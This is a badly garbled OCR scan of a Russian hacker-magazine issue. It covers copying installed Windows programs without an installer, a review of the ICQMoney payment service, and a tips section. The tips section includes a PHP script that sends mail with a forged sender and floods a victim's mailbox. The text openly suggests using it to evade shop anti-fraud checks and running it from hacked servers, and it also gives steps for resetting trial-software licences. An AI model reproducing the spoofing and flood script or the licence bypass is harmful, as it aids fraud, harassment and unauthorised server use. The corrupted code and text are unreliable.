А многолетний опытавтора показывает, что защищаться от малвари 
можно и нужно, □с 
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Хочется перенести программу на другой компьютер, но дистрибутив утерян или необоз-| 
|начен, а если даже и обозначен, жаль терять свои настройки. Знакомая ситуация^не^Д 
|правда ли? Существует множество утилит клонирования программ, но все они требуют | 
[обязательного наличия инсталлятора. А у нас его нет! Но если постараться и немного^Д 

подумать, то можно обойтись и без 



огда-то, еще во времена старой-доброй М5-005, перенос, 
программ решался тривиальным копированием базового 
каталога (например, \ѲАМЕ5\000М2\) с одного компьютера 
на другой. Эта техника не утратила своей актуальности и 
до сих пор, но используется все реже и реже. Современные программы 
в подавляющем большинстве нагло лезут в реестр, в директории типа 
\ѴѴІ N ЫТ\5у5І;е гтт32 и еще в десяток подобных мест, разбрасывая свой 
код, данные и временные файлы по всей системе, а потому копирование 
базового каталога чаще всего уже ничего не решает, и на новом компью- 
тере программа категорически отказывается работать. 

Этим активно пользуются многие фирмы, специализирующиеся на об- 
служивании офисной техники. Устанавливая программы без дистрибути- 
вов, они сажают пользователей на иглу, вынуждая постоянно обращаться 
ксебеза повторной установкой. 

В МЕТОД КАМЕННЫХ СТРЕЛ И ТОПОРОВ 

Начнем с самого тупого и классического метода. Сначала копируем 
базовый каталог на новую машину и запускаем приложение. Программа 
ругается, сообщая, чего ей там не хватает. Надо сказать, что не хватает 
ей обычно динамических библиотек. Ну что ж — находим их и копируем. 
Запускаем и... снова обламываемся. Дело втом, что весь список отсутс- 
твующих библиотектебе никто не сообщит, поэтому продолжаем этот 
незамысловатый процесс до тех пор, пока программа незапустится или 



пользователь не обломается. А обломаться он может по очень многим 
причинам. Стоиттолько программе вместо внятного сообщения об ошиб- 
ке выдать что-то типа «Неправильная установка» — и все. Кранты! 

Н САМЫЙ ПРОСТОЙ СЛУЧАЙ 

Хорошо, инсталлятора у нас нет. Но деинсталлятор в подавляющем боль- 
шинстве случаев все-таки остается. Чаще всего он кладется в базовый 
каталог с программой, реже — в папку \ѴѴІ N ЫТ\І пз1;а 11ег\. А деинсталлятор 
— это... тот же самый инсталлятор, только наоборот! Развернув принцип 
на 180 градусов, мы получим инструмент, который, собственно говоря, и 
искали. На самом деле, конечно, просто та к взять и превратить деинстал- 
лятор в инсталлятор не получится, как его не крути. Но вот выдрать из 
него списокустанавливаемых файлов/драйверов и ветвей реестра впол- 
не возможно. В половине случаев вообще не надо ломать голову, потому 
как в основном каталоге программы лежит лог-файл (обычно с расшире- 
нием Іод), созданный инсталлятором с перечнем всех совершенных им 
действий. Загрузив его в любой текстовый редактор, например в РАР по 
<Р4> или <РЗ>, мы можем видеть, какие файлы, динамические библио- 
теки и драйверы были скопированы и какие ключи реестра созданы. 
Остается только повторить эти действия вновь и... программа встанет на 
соседний компьютер как родная! 

Так, ладно, довольно теории. Займемся практикой. Откроем для при- 
мера базовый каталог программы Масго Ехргезз 3, найдем в нем файл 
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ІЫЗТАИИ-ІОѲ и загрузим его в любой текстовый редактор. Мы видим 
не только копируемые файлы/ярлыки/динамические библиотеки/еіс, 
но и ветви реестра вместе с их значениями! Кстати, обратим внимание, 
что помимо базового каталога Масго Ехргевз 3 добрался до директории 
Соттоп Еііев и начал там слегка безобразничать. 

Впрочем, нам просто повезло. В некоторых (достаточно редких) случаях 
в лог-файл попадаюттолько сами ветви реестра, создаваемые инстал- 
лятором, без ихзначений, что, собственно говоря, и неудивительно, 
поскольку лог-файл чаще всего создается для деинсталлятора, которому 
достаточно знать лишь имя ключа реестра. На конкретное значение ему 
плевать. Вот оно и не попадает в лог. Ну что делать? Придется открыть 
старый-добрый редактор реестра и быстро-быстро извлечь оттуда все 
значения из обозначенных ключей на автопилоте. 

Н А ЕСЛИ ЛОГА НЕТ? 

Гораздо хуже, когда никакого лога в нашем распоряжении нет. Возьмем, 
например, достаточно известную утилиту РОЕ Сгеаіог. В базовом 
каталоге из всех интересующих нас вещей лежатлишь ипіпзООО.ехе и 
ипіпзООО.баР Ну первый из них мы отбросим сразу (это исполнительный 
движок — общий для всех программ, созданных инсталлятором данного 
типа), а вот ипіпзООО.баі откроем в РАР'е по <РЗ> или в Ніеѵѵ’е. 

В первой же строке мы видим: I п по Зеіир ІІпіпвіаІІ Вод (Ь). Ага, значит, это 
лог, созданный инсталлятором I п по Зеіир. И хотя лог неупакован (смотри 
по <РЗ> сколько хочешь), он представлен в неудобном для нас нетекс- 
товом формате — в общем, изучать его в таком виде вообще не вариант. 
Гораздо удобнее будет заплатить десяток баксов за декомпилятор (или 
найти бесплатный)! 

Набираем в Ѳоодіе «Іппо бесогшрііег» и получаем внушительный список, 
в котором мне больше всего понравился бесплатный ІпвіаІІЕхрІоге 
от Сергея Ванина, выполненный в виде плагина для РАР’а, — ЫТрУ/ 
рІидгіпдіагтападег.сот/сІоѵѵпІ.сіЛіІ.ез/іпзіехрІ ѵО.З.гаг . Просто наводим 
курсор на файл, который мы хотим декомпилировать, нажимаем <5ЫЛ- 
Е3> и получаем список файл о в/клю чей реестра в удобочитаемой форме 
или... сообщение об ошибке, но это очень редкий случай. Что ж делать, 
придется отправляться на поиски другого декомпилятора. 

Ксожалению, существует большое количество инсталляторов, для 
которых до сих пор нет достойных декомпиляторов. Взять хотя бы КІиНзоЛ 
Іпзіаіі Бузіет (да -да, тот самый ЫиИзоЛ, подаривший нам ѴѴіпатр), 
который используется для установки, к примеру, АЬузв ѴѴеЬ Зегѵег. Мы 
видим всего лишь один файл ипіпвіаіі.ехе, который включает в себя как 
исполнительный движок, так и лог. 



Просматривая лог в Ніеѵѵ’е, мы видим текстовые строки (смотри листинг), 
из которых заключаем, что программа что-то заносит в файл ѵѵіпіпіі.іпі. 
Находим этот файл в каталоге ѴѴІп б оѵѵв, открываем его и видим текстовую 
строку «[Репате] ЫІІЕ=С:\00СІІМЕ~1\ КРІ5КА~1\ЮСАЕ5~1\Тетр\ 
А~Ы5І5и_.ехе», так что с этим пунктом все ясно. Далее видно, что АЬувв 
ѴѴеЬ Зегѵег копирует себя в СЛРгодгат Еііез в РгодгатЕіІевОіг — каталог 
с именем программы (в данном случае это АЬузв ѴѴеЬ Зегѵег), после чего 
лезет в ключ реестра ЗоЛѵѵаге\Місго50ІТ\ѴѴІпсІоѵѵ5\Сиггеп1:Ѵег5Іоп и чего- 
то там создает. Ну, что он там создает, догадаться нетрудно: АЬувв ѴѴеЬ 
Зегѵеги создает. После этого добавляет себя на панель быстрого запуска 
Оиіск ЬаипсЬ и на этом считаетсвою миссию выполненной. 

Вот мы и декомпилировали двоичный файл деинсталлятора в Ніеѵѵ’е 
(или в РАР’е по <ЕЗ>) без всяких дополнительныхутилит, то есть вручную. 
Конечно, нам повезло, что ипіпзіаіі.ехе не был упакован никаким протек- 
тором (в жизни и такое случается), а лог лежал в незашифрованном виде. 
Иначе без помощи отладчика и дизассемблера нам бы уже не обойтись. 
Однако это клинические случаи, которые практически не встречаются, 
а если даже и встречаются, то существуют гораздо более короткие пути, 
чем отладка и дизассемблирование. 

Н МОНИТОРИНГ ФАЙЛОВ И РЕЕСТРА 

Утилиты для наблюдения за обращением к файлу и ветвям реестра дос- 
таточно популярны в среде хакеров. Казалось бы, что можетбыть проще: 
запускаем Ыетоп/гедтоп и смотрим, куда лезет наша подопытная 
программа. Конечно, с полученной простыней протокола еще предсто- 
ит повозиться, выкидывая из нее повторные обращения, но это всеже 
проще, чем ковыряться в двоичном файле по <ЕЗ>. 

На самом деле средства мониторинга — это Іавѣ гезогі, к которому при- 
бегают, когда по-другому перенести программу с одного компьютера на 
другой никак не получается. Дело в том, что всякая программа активно 
обращается и ктем ветвям реестра, которые сама не создает. Проде- 
монстрируем это на примере популярного почтового клиента ТЬе ВаТ 
протокол общения с реестром которого представлен на картинке. 
Достаточно очевидно, что ветвь НКСЫ\5о[іѵѵаге\ПІТ\ТЬе Ваі!\ЕсІТог\ 

Еопі 5І2е принадлежит самому ТЬе ВаКу и должна быть перенесена 
на соседний компьютер вместе с ним. А вот ветвь типа НКЕМ\5увіет\ 
СиггепіСоп1;го[5еЛ5егѵісев\Тсрір\Рагате1;егз\Іп1ег[асев\{5В1 6484-4038- 
4523-060-83753Е568472}уже является частью системы и относится к 
ТСР/ІР-стеку со всеми его интерфейсами, идентификаторы которых на 
разных компьютерах наврядли будут совпадать. 

Возникает резонный вопрос: как отделить зерна от плевел, то есть 
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Софтина 




Да, реально. 


ІпзІаІІЕхрІоге от 




Потрошит инсталя- 


Сергея Верейкина 




торы Іппо Беіир 


- просто супер! 




- только в путь! 




I шІЛ 




Список используемых библиотек можно посмотреть с помощью утилиты 
Ргосезз Ехріогег 



выделить л ишь те ветви реестра (файла), которые были созданы самой 
программой при ее установке? Ответ прост. Копируем базовый каталог 
подопытной программы на соседнюю машину, на ней же запускаем мони- 
тор реестра и смотрим, с открытием каких именно ветвей она обламы- 
вается (в этом случае в статусе операции будетуказано ЕРРОР или ЫОТ 
РО Ц) N О . Однако следуетучесть, что некоторые ветви реестра отсутствуют 
не просто так, а по творческому замыслу разработчика программы. В этом 
случае на целевом компьютере (с правильно установленной программой) 



монитор реестра выдасттотже самый результат — КІОТ Р01Л\Ю. 
Переносже ветвей реестра осуществляется элементарно, через его 
редактор. Просто выделяем требуемую ветвь, щелкнув по ней. В меню 
выбираем «Реестр Экспорт файла реестра» и в появившемся диало- 
говом окне говорим, что хотим экспортировать только выбранную ветвь, 
а не весь реестр целиком. Мы получаем гед-файл, запустив который на 
соседней машине, добавляем эту ветвь в реестр. Порядок добавления 
ветвей произволен. 



Охота за 
инамическими 
иблиотеками 

В некоторых руководствах по выдиранию приложений встречается 
утверждение, что определить набор используемых динамических 
библиотек можно с помощью ОПу или Ргосезз Ехріогег’а. Все они 
показывают список БЫ, загруженных в адресное пространство ис- 
следуемого процесса, делая тайное явным. И не нужно ковырять логи 
деинсталляторов. ОК, запускаем Ргосезз Ехріогег и смотрим, какие ОБЬ 
использует, ну например, Опера. 

И вот тут нас ждет «приятный сюрприз». Оказывается, что посторон- 
ние программы весьма активно внедряют свои динамически библи- 
отеки во все запускаемые приложения для организации межпроцес- 
сорного взаимодействия. В данном случае мы видим РБЕ5ККЕ5.0ББ, 
РБЗНЕББ.БББ, РВТООБЗ.ЭББ, принадлежащие оснастке карты Маітох 
0450, а также ЗЗЗепзог.сШ от ЗуСаЩ Регзопаі Еігеѵѵаіі. И хотя от того, 
что мы перетащим их на соседнюю машину, никакого вреда не будет 
(без соответствующих ехе эти библиотеки будут лежать мертвым 
грузом), но ведь и пользы от них никакой! А винчестеры все-таки не 
резиновые. Но даже это не самое страшное! 

Некоторые динамические библиотеки подгружаются лишь в строго 
определенных ситуациях, например при нажатии на кнопку «Печать» 
или вызове определенного пункта меню. Естественно, до тех пор пока 
эти действия не будут совершены, список НИ, выдернутый из адресно- 
го пространства, будет одновременно и избыточный, и неполный. 



Регистрация ОТ ,Е- 
и АсгіѵеХ- 
компонентов 

ОБЕ- и АсгіѵеХ-компоненты (заключенные в файлах с расширениями 
сШ или осх) помимо переноса на соседний компьютер требуют обяза- 
тельной регистрации. Регистрация осуществляется штатной утилитой 
ге§зѵг32.ехе, запускаемой с именем регистрируемой библиотеки в 
командной строке. Просто берем сШ- или осх-файл и передаем его имя 
утилите ге§зѵг32.ехе в качестве параметра. Если регистрация прошла 
успешно, то все ОК, если же нет — мы увидим сообщение об ошибке. 
Беда в том, что если практически все осх-файлы являются ОБЕ-ком- 
понентами, то в случае с сШ этого не скажешь. Как узнать, кто из них 
кто? Без дизассемблирования (и даже без подглядывания в таблицу 
импорта), только методом тыка! 

Впрочем, процесс регистрации обратим, и ключ /и удаляет зарегистри- 
рованный компонент из системы. К сожалению, описанный способ не 
универсальный и далеко не всегда срабатывающий. Некоторые компо- 
ненты требуют регистрации с ключом /I, ожидающим увидеть строку 
параметров, которых мы не знаем и о которых даже не догадываемся. 

А ведь без правильной регистрации всех компонентов программа рабо- 
тать не будет! 

Особенно много компонентов содержат программы, написанные наѴізиаІ 
Вазіс’е и ОеІрЫ. Впрочем, не будем отчаиваться. Раз регистрация по сути 
своей сводится к созданию новых ключей в системном реестре, то все они 
могут быть найдены по методике, описанной выше. То есть через монитор. 




► 034 
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Найденныезначения реестра вовсе необязательно должны бытьтакимиже на другом компьютере! 



С файлами же все обстоитеще проще, они могутбыть извле- 
чены даже без всяких мониторов. Достаточно воспользо- 
ваться поиском по дате. 

Н СЛЕДЫ ВРЕМЕНИ НА ПЕСКЕ ФАЙЛОВОЙ СИСТЕМЫ 

Заходим в базовый каталог программы и смотрим, когда 
был создан главный исполняемый файл (кликаем правой 
клавишей мыши по «Свойствам»), например ѴМѴѴаге.ехе. 

На компьютере автора время ее установки — 1 0 июня 2004 
года, 18:12:30 (версия уже устарела, как мамонт, но для нас 
сойдет). 

Давим «Пуск -> Найти -> Файлы и папки» и в параметрах 
поиска вводим «Дата Файлы, созданные^ с 10.06.2004 по 
1 0.06.2004 -> Найти». Таким образом мы находим всю дичь, 
спрятанную нетолько в базовом каталоге ѴМѵѵаге, но и в ка- 
талогах С :\ѴѴІ N МТ\5уз1;е пт32 и С :\ѴѴІ N ЫТ\5у5І;епп32\0 гіѵегз. 
Красота! 

К сожалению, этот способ не лишен недостатков. Если 
две или более программы устанавливались в один и тот 
же день, то поискпо времени покажет их всех, посколь- 
ку глупая оболочка ѴѴіпбоѵѵз не позволяет задавать в 
критериях поиска минуты и секунды (да мы и не должны 
их задавать, ведь процесс установки иной раз занимает 
полчаса или околотого). 

Впрочем, просматривая свойства всех найденных файлов 
через контекстное меню (там время создания указывается 



с точностью до секунды), мы легко отсеем посторонних кан- 
дидатов, конечно, при том условии, что разные программы 
ставились с приличным разносом во времени. Если же ус- 
тановка проводилась в конвейерном режиме (то есть одна 
программа за другой), определить, какие файлы принадле- 
жат какой программе, практически невозможно. 
Другойтонкий вопрос. Если на момент установки 
подопытной программы требуемые ей библиотеки уже 
имелись на компьютере (например, . N ЕТ Егатеѵѵогк), то, 
очевидно, они не были установлены, а даже если и были, 
то... при перезаписи новых файлов поверх старых время 
их создания не меняется (так уж устроен ЫТЕЗ-драйвер). 
В результате после переноса на соседний компьютер 
программа может не найти каких-то библиотек и не 
запуститься. Каких именно, поможет выяснить файловый 
монитор, хотя в большинстве случаев удается обойтись 
и без него. 

Н С ЭТИМ СПРАВИТСЯ КАЖДЫЙ! 

Могу смело тебе сказать одно: практически любую про- 
грамму можно скопировать на другой компьютер, не имея 
инсталлятора. Процесс этот не то чтобы сложный, но сильно 
утомительный, особенно если мы нарвемся на какой-нибудь 
клинический случай. Хотя в целом никаких непреодолимых 
проблем на этом пути не возникает и специальных хакерских 
навыков не требуется, ц-ц 



Ошибка! Значит декомпилятор не подходит! 
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> СІѴСІ 

Все утилиты, 
необходимые для 
копирования уже 
установленного 
приложения, мы 
выложили на нашем 
ОѴО. 



/«\ 







> ѵѵагпіпд 

Помни, что, копируя 
лицензионные 
программы, ты нару- 
шаешь действующее 
законодательство. 

Ни авторы, ни ре- 
дакция в этом случае 
ответственности не 
несут. 
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гда появляется что-то новенькое, всегда хочется его тут же попробовать, оценить 



ВАСИЛИЙ ЛЕНСКИЙ 

/ Ѵ.І_ЕЫ5КѴ@СМАІІ_.СОМ / 



НЕБОЛЬШОЕ РАССЛЕДОВАНИЕ ПО ПОВОДУ НОВОЙ ПЛАТЕЖНОЙ СИСТЕМЫ 



возможности и иногда даже взять на вооружение. А если это что-то связано с денежными 



средствами, то нас это привлекает особенно сильно :). И естественно, появление новой 
платежной системы, тем более в России, мы просто не могли оставить незамеченным. 



Мы решили посмотреть, на что способна новая российская платежка. 



ама идея довольно оригинальна. Если большинство платеж- 
ныхсистемживутсами по себе, то в случае с ІСОМопеу все 
изначально рассчитано на работу совместно с мессенжером. 
Все платежи осуществляются прямо из окна привычной и уже 
ставшей родной аськи. Обсуждая детали сделки с партнером, можнотутже 
перевести ему аванс, причем для этого понадобится лишь несколько раз 
кликнуть мышкой. Никаких дополнительных программ, кучи открытых окон 
и т.п. Идея нам очень понравилась, но реализовать платежную систему 
поверх I СО нетак просто. И уверенности втом, что все это будет работать 
как надо, у нас не было до самого последнего момента. 

В ВИРТУАЛЬНО-РЕАЛЬНЫЕ ДЕНЬГИ 

До настоящего времени полноценных платежных систем в России было 
всего две: ѴѴеЬМопеу [ ѵѵѵѵѵѵ.ѵѵеЬппопеѵ.сопп ) и Яндекс.Деньги [ топеѵ. 
ѵапсіех.ги ). В чем их секрет? ѴѴеЬМопеу была первой подобной разработкой 
в России, которая начала свою деятельность еще с ноября 1 998 года. В 
общем-то, стех пор она стабильно работает, а потому завоевала доверие 
многих пользователей. Яндекс.Деньги, в свою очередь, являются продук- 
том известнейшей ІТ-компании, поэтому с ним охотно сотрудничают все- 



возможные платежные системы и сайты, финансовыеучреждения. У обеих 
систем давно отлажены процедуры ввода-вывода денег, местами не очень 
удобные, но зато привычные пользователям. Лично меня в ІСОМопеу 
интересовало в первую очередьудобство (да и вообще сама возможность) 
ввода-вывода денежных средств и их безопасность. Времени с 19 ноября, 
а именнотогда был запущен сервис ІСОМопеу, прошло совсем немного. 
Отзывов о системе пока очень мало. Поэтомуя первымделом решил 
посмотреть, как можно зачислить деньги на электронный кошелек и как 
просто их можно вернуть обратно. В случае если единственной возможнос- 
тью оказалась бы покупка карты оплаты, то всю эту затею я, наверное, сразу 
бы послал на фиг. Найти такие карты нелегко, да и продаются они обычно 
с большой наценкой. В общем, не вариант. После изучения официальной 
информации сталоясно, что ІСОМопеу прошел тестнаура. Пополнить счет 
можно через банк (выписав квитанцию), картой оплаты (в продаже я их 
пока не видел даже в Москве), электронным чеком и платежом через тер- 
минал. Для того чтобы проверить все в деле, разумеется, потребовалось 
за регистрировать аккаунт. 




► озб 
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Для того чтобы вывести средства 
на свой банковский счет, необхо- 
димо указать реквизиты 
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Прикольно, чтос помощью ІСОМопеу можно оплатить мобильник, инети 
спутниковое ТВ без комиссии. 



В РЕГИСТРИРУЕМ АККАУНТ 

В качестве основного инструмента работы с системой разработчики 
предлагаютиспользоватьспециальный клиент, который называется БІМ 
(Бе На Кеу Іпвіапі Мезвепдег). Быстренько скачав его с сайта, я распаковал 
архив и запустил приложение. Тутже появились поля для ввода ІСО-уина и 
пароля, атакже окно, где было необходимо ввести данные о своем кошель- 
ке. Потому как никакого кошелька у меня еще не было, я смело нажал на 
«Регистрацию», и в браузере открылась новая страница. 

О пользователезапрашивается достаточно подробная информация: ФИО, 
фактический и юридический адреса, а также паспортные данные. По всей 
видимости, в момент регистрации никакой их проверки не осуществляет- 
ся, но в случае предоставления некорректных данных, вполне возможно, 
проблемы могут возникнуть в будущем. 

После заполнения всех полей на почтовый ящик приходит логин для 
платежной системы (случайно сгенерированный, но его можно позже на- 
значить самостоятельно) и специальный код активации, который требуется 
ввести в программе при первом запуске. 

Первоначально, когда я только писал эту статью, активация выполнялась 
другим способом. Код нужно было сообщать по I СО специальному боту, 
причем большая часть выдаваемых номеров часто была в оффлайне и не 
реагировала на сообщения. Конечно, в списке были опііпе-боты, которые 
мгновенно проглатывали активационный код, завершая регистрацию. Но 
сама процедура показалась мне довольно сомнительной: непонятно было, 
как разработчики решат проблему флуда, ведь конкурентам и просто недру- 
гам ничего не будет стоить засыпать этих ботов флудом. Но программисты 
ІСОМопеу, словно читая мои мысли, еще до сдачи этого номера внедрили 
новый путь активации, когда код просто вводится при первом запуске 
программы и передается системе с помощью собственного протокола, 
минуя ІСО. 

Н РАБОТАЕМ С СИСТЕМОЙ 

Теперь система радостно приняла мой логин и пароль, и можно было продол- 
жать расследование. Сам клиент, кроме информации о балансе вверху окна, 
ничем примечательным неотличался. Красовавшийся там ноликговорил о 
том, что на счету ничего нет и было бы совсем неплохо его пополнить. Сделать 
это очень просто: достаточно нажать на иконку рядом и выбрать в меню пункт 
«Пополнитьсчет». Кромеуже перечисленных методов ввода денегдоступны 
также переводы из всевозможных платежных систем (ѴѴеЬМопеу, Ріірау 
ІІкгппопеу и другие). Я решил воспользоваться пополнением через терминал 
оплаты, которые сейчас стоят буквально на каждом углу. Система работает со 
всеми известными сетями: БеНа Кеу, ОСМП, «Киберплат», Е-рогі, «Дельта 
Телеком», распространенными почти повсеместно. 

Я выбрал соответствующий пункт и получил 1 1 -значный номер, который 
следовало ввести при оплате. Прикольно, что по своемузапросу можнотут 
же обратиться к так называемому геолокатору и узнать адреса ближайших 
терминалов (и даже их состояние: работает или нет!). Правда, свой город 
придется вводитьвручную.туточеньпригодиласьбы привязка по ІР-ад- 
ресу. Сам 1 1 -значный номер нужно переписать или напечатать вручную, 



потому как никакой возможности скопировать его хотя бы в буфер обмена 
нет. Хотя в принципе это и не требуется, если ты помнишь свой ІСО. Номер 
и меет формат 16ХХХХХХ, где префикс 16 — это ІСОМопеу, а ХХХХХХ — это 
номер пополняемой ІСО. 

Каквидишь, все просто, нотутже выяснилась одна неприятная особен- 
ность. Платежи через терминал задерживаются на 24 часа, что впрочем 
справедливо для всех систем (втом числе Яндекс. Деньги и ѴѴеЬМопеу), 
поэтому никаких претензий конкретно к ІСОМопеутутбыть не может. Тем 
более что мера эта временная. Ждать мне было неохота, поэтому я выбрал 
другой пункт и буквально за минуту пополнил кошелек, списавденьги с 
кошелька ѴѴеЬМопеу. 

Н ВАЛЮТА И ДРУГИЕ ТОНКОСТИ 

В отличие отдругих систем, в ІСОМопеу действуетсвоя собственная валюта 
и все операции выполняются в так называемых юнитах (СІЫІ). Курс покупки 
и продажи всегда публикуется на главной странице платежной системы 
БеНа Кеу. В общем случае 1 юнит — это 10 рублей. Меня сильно порадовало, 
что в системе предусмотрено несколько видовтарифов, от которых зависит 
комиссия, взимаемая при осуществлении любой из операций. Поумолчанию 
устанавливается базовый тариф без абонентской платы, но с обязательной 
комиссией 0,75% от суммы платежа, которая снимается с плательщика. Тем, 
кто будет использовать систему интенсивно, придется по душе другой тариф, 
который отменяетлюбую комиссию, но снимает каждый месяцабонентскую 
плату в размере 45 юнитов. Третий тариф — самый крутой. Заплатив 1 500 дол- 
ларов, ты получаешь ѴІР-карту и навсегда освобождаешься отабонентской 
платы и комиссии. Интересно, кто-нибудьуже успел приобрести такую? :) 
Следующий вопрос: как перевести деньги? Это, наверное, главный плюс 
системы, потому как все, что нужно, — это указать нужный ник в списке 
контактов и, нажав правую кнопку мыши, выбрать пункт меню «Отпра- 
вить юниты». Оченьудобно! Не надо больше лезть в другие программы и 
копировать оттуда номер кошелька — в качестве идентификатора клиента 
используется его ІСО-номер. 

Другой важный вопрос — как вывести деньги? Тут вообще все просто. Если у 
тебя есть банковский счет, то можно передать деньги прямо на него. Выби- 
раем «Вывести юниты в-> Банк», далееуказываем все реквизиты и ждем, 
пока пройдет платеж. Если тебе удобнее выводить деньги из другой пла- 
тежной системы, тоже нет никаких проблем: ты можешь перевести средства 
на свои кошельки в ѴѴеЬМопеу, Яндекс. Деньги, Е-Ѳоісі , Рирау, Е-рогі или 
на счетсвоего мобильного телефона! Что особенно порадовало, такэто 
возможность прямо через этот сервис заказать себе банковскую карточку 
(единоразовый платеж — $50) и выводитьденьги через нее. Оченьздорово! 

В БЕЗОПАСНОСТЬ 

У тебя наверняка уже давно созрел вопрос: а что будет, если номер ІСО 
уведут? Да, ничего! В любой момент можно объявить свой старый III N 
украденным и перевести деньги на с вой новый номер ІСОМопеу. А меня 
еще интересовало, каким образом используется по сути небезопасный 
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протокол ІСО для проведения денежныхтранзакций. Очень скоро стало 
ясно, что сам ІСО III N используется лишь для удобной идентификации 
пользователей в системе. А вся информация передается в зашифрован- 
ном виде по протоколу 551. Именно поэтому, даже если кто-то уведет 
номерІСО.онне сможет ни воспользоваться деньгами, ни сменить 
настройки безопасности. 

Крометого, можно серьезно защититься, установив ограничение по ІР 
или же использовав динамические одноразовые ключи. Кстати говоря, 
для осуществления любой транзакции требуется платежный пароль, 
который отличается от пароля на кошелек и тоже вводится во время 
регистрации. 

Н КАК ПРИНИМАТЬ ПЛАТЕЖИ 

Ты всегда можешь за просить деньги (выставить платежное требование) 
у любого пользователя системы. Например, за оказанные услуги. Более 




Перед использования своего кошелька 
необходимо авторизироваться 



того, система поддерживает собственный тегсЬапТ что позволяет вла- 
дельцам ѵѵеЬ- магазинов принимать деньги от пользователей ІСОМопеу. 
Причем для активации тегсИапІ; нетребуется персональный сертификат 
и идентификация личности, как это принято, например, в ѴѴеЬМопеу. 

Ш ОСОБЕННОСТИ КЛИЕНТА 

Напоследок пару слов хочется сказать о стандартном клиенте БІМ. С 
первого же взгляда стало ясно, что основа нон на открытых исходниках 
другого мессенжера — Ітабегіпд [ ѵѵѵѵѵѵ.ітасіегіпд.сот і. Если он тебя 
чем-то неустроит, возможен альтернативный вариант. Уже сейчас су- 
ществует специальный плагин для Крысы. Скачать вместе с программой 
его можно с официального сайта П&О [ ѵѵѵѵѵѵ.гпд.ги ]. Вероятно, в скором 
времени появятся плагины и для других мессенжеров, в том числе и для 
Миранды. Азначит, система при всех своих достоинствах будет разви- 
ваться еще быстрее, т 




ІСОМопеу — это тесная интеграция 
мессенжера ІСО и платежной системы 
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ХАКЕРСКИЕ СЕКРЕТЫ 
ПРОСТЫХ ВЕЩЕЙ 




ЗАДАЧА: 



\ ОТОСЛАТЬ ПИСЬМО С ПОДДЕЛЬНЫМ 

АДРЕСОМ ОТПРАВИТЕЛЯ. 

РЕШЕНИЕ: 



Зачастуюу многих из нас возникает необходимость отправить на мыло мес- 
са гу с поддельным адресом отправителя. Цели у всех разные: кто-то просто 
хочет приколоться над другом, а кто-то таким образом обходитантифрод в 
очередном забугорном шопе :). Тем не менее способ реализации в обоих 
случаях одинаковый. Для наглядности я подробно распишу все необходи- 
мые действия, чтобы у тебя не возникало лишних вопросов. Итак: 

1. Берем в руки РНР и начинаем кодить (комменты ниже): 



<? 

ідпоге_изег_аЪогб (1); 
зеб_6іте_1ітіб ( 0 ) ; 

$6о = " багдеббтаіі . сот" ; // здесь вбиваем мыльник недру- 
га (куда будем отсылать письмо) 

$6гот = " бготбтаіі . сот" ; / / указываем адрес отправителя 
$зикдесб = "безб" ; // тема нашего письма 

$тзд = "таі1_теззаде" ; // сама мессага :) . 

//$скеск = "уоиг_шаі1@шаі1 . сот" ; // необязательный па- 
раметр — отсылка лога тебе на мыло 
$атошіб =1; // количество писем 

$61= ( " . /Іод . бхб " , "те" ) ; 

$сошіб = 0; 

іб ( збгіеп ( $6гот) == 0 I I збг1еп($6о) == 0 I I 
збгіеп ($тзд) == 0 I I збгіеп ( $атоітб ) == 0) 

{ 

есТю ( "<Ьгхсепбег>Шгібе теззаде ! </сепбег>" ) ; 
ехіб I 
} еізе 
{ 

ѵбЬіІе ( $сошіб < $атошіб) 

{ 

таіі ( " $бо" , " $зиЬЦесб" , " $тзд" , "Ргот: $6гот"); 



соипб . = + 1 ; 

6рибз($61, "$соипР біооб-іеббегз ѵ^аз зепбеб . . . \п" ) ; 

} 

іб ( збгіеп ( $с1зеск) != 0) 

{ 

$скеск_бехР = 'Бопе! $соипР Іеббегз ілаз зепбеб! \п ' ; 
$скеск_зиЬ = 'Скеск' ; 

таіі ( " $сЬ.еск" , " $сЬ.еск_зиЬ" , " $скеск_бехбѵ, 
"Ргот: $6готѵ) ; 

6рибз($61, "Бопе! $соипб Іеббегз ѵ^аз зепбеб! \п" ) ; 

} 

еізе 

{ 

брибз ( $61 , "Бопе! $соип6 Іеббегз ѵ^аз зепбеб! \п" ) ; 

} 

} 

бсіозе ( $61 ) ; 

?> 

Как видишь, получившийся скриптумеет нетолько отсылать мессаги от 
левого отправителя, ной довольно успешно флудит мыльни кжертвы. Все, 
что оттебя требуется, — это указать данные, к которым я оставил коммента- 
рии в коде. 

Прижеланииты можешьзадать параметру $атоип1 значение 100 и 
пофлудить чужой мыльник. Однако стоит помнить, что рассылка проводит- 
ся средствами РНР, а следовательно, полноценного спама не получится 
(одним словом, нежадничай :)). 

2. Далее необходимо выбрать сервер, с которого мы будем запускать наш 
скрипт. Если тебе надо отослать лишь одно письмо с поддельным обратным 
адресом, то можешь смело регаться на фриварных хостингах с поддержкой 
РНР. Как правило, они разрешают отправку писем со своих доменов, 

но с очень жестким тайм-аутом (вплоть до минуты). Ну а если ты хочешь 
заняться флудом, то без ломаных серверов здесь не обойтись. В общем, 
как и где найти сервер, объяснять, думаю, не нужно, только не забывай про 
обязательное наличие РНР и Зепбтаіі. 

3. Раздобыв сервер, быстренько заливаем вышеописанный РНР-скрипт, 
указываем свои параметры и запускаем его :). 

Вот, собственно, и все. Надеюсь, флуд чужого мыльника будет долгим, а 
глум над приятелем — веселым и продолжительным :). 



№2 



|3 АДАНА: 



ОКОНЧАНИЯ СРОКА ДЕЙСТВИЯ ТРИАЛ-ВЕРСИИ. 

Для чего это может понадобиться? Собственно, для продления срока 



использования программы. Немного об этичности и законности подоб- 
ного подхода. Не вдаваясь в юридическиетонкости, я лишь попробую 
извернуться и скажу: софт, выполняющий задачи возвращения кжизни 
дохлых программ, просто чистит реестр от ключей, о которых пользователь 
и понятия-то не имеет. Реестр мой, в нем я могу творить все, что захочу, 
могуудалять или модифицировать ключи, как мне заблагорассудится. И 
если приэтом некоторые программы начинают работать и после окончания 
срока действия своей триальной лицензии, то я в этом не виноват :). 
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Бдительный Тгіаі-Резеі: отыскал в недрах реестра ключи АгтасШо 



РЕШЕНИЕ: 

1. Скачиваем илиустанавливаем с нашего диска программу Тгіаі-Резеі. 

2 . Запускаем программу и выбираем в меню «Ргоіесіогз -> АН -> 5сап». 

3. Находим в списке найденных ключей те ключи, в пути/имени которых 
фигурирует имя программы или ее компании-изготовителя, и удаляем их, 
выбрав в меню правой кнопки мыши Сіеаг Кеу. 



4 . Запускаем программу и, если она откажется работать после этой проце- 
дуры, находим в списке найденных ключей те, которые созданы той же сис- 
